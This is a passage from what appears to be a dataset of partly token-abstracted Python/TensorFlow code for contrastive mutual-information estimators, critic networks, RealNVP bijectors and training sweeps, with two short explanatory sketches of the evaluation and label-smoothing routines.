`real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, 
None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n 
training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
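The downstream evaluation in these entries (`logistic_fit`) min-max scales the learned representations and scores a multinomial logistic regression on them. The short sketch below mirrors that routine with synthetic arrays standing in for the mapped codes; it is illustrative only and uses the same solver settings as the embedded function.

import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import MinMaxScaler

def logistic_fit_np(x_train, y_train, x_test, y_test):
    # Scale features to [0, 1], then fit and score multinomial logistic regression.
    scaler = MinMaxScaler()
    x_train = scaler.fit_transform(x_train)
    x_test = scaler.transform(x_test)
    clf = LogisticRegression(solver='saga', multi_class='multinomial', tol=0.1, C=10.0)
    clf.fit(x_train, y_train.ravel())
    return clf.score(x_test, y_test.ravel())

rng = np.random.default_rng(2)
x_tr, x_te = rng.normal(size=(100, 16)), rng.normal(size=(40, 16))
y_tr, y_te = rng.integers(0, 10, 100), rng.integers(0, 10, 40)
print(logistic_fit_np(x_tr, y_tr, x_te, y_te))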
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = 
copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event 
size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, 
None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n 
training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
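The label_smooth_pcc objective recorded in the row above treats the critic matrix as logits of a binary classifier over pairs (identity matrix marks the positives) and smooths the hard 0/1 targets before binary cross-entropy. A minimal sketch, assuming TensorFlow 2.x and a hypothetical smoothing value of 0.1 standing in for the script's args.smoothing:

import tensorflow as tf

def label_smooth_pcc(f, smoothing=0.1):
    # f is an [n, n] critic matrix; the identity matrix marks the positive (joint) pairs.
    n = tf.shape(f)[0]
    labels = tf.reshape(tf.eye(n), [-1, 1])
    labels = (1.0 - smoothing) * labels + smoothing / 2   # soften the hard 0/1 targets
    probs = tf.reshape(tf.sigmoid(f), [-1, 1])
    bce = tf.keras.losses.BinaryCrossentropy()
    return -bce(labels, probs)  # negative BCE, mirroring the recorded objective

# Illustrative usage with a random critic matrix.
print(float(label_smooth_pcc(tf.random.normal([32, 32]))))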
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = 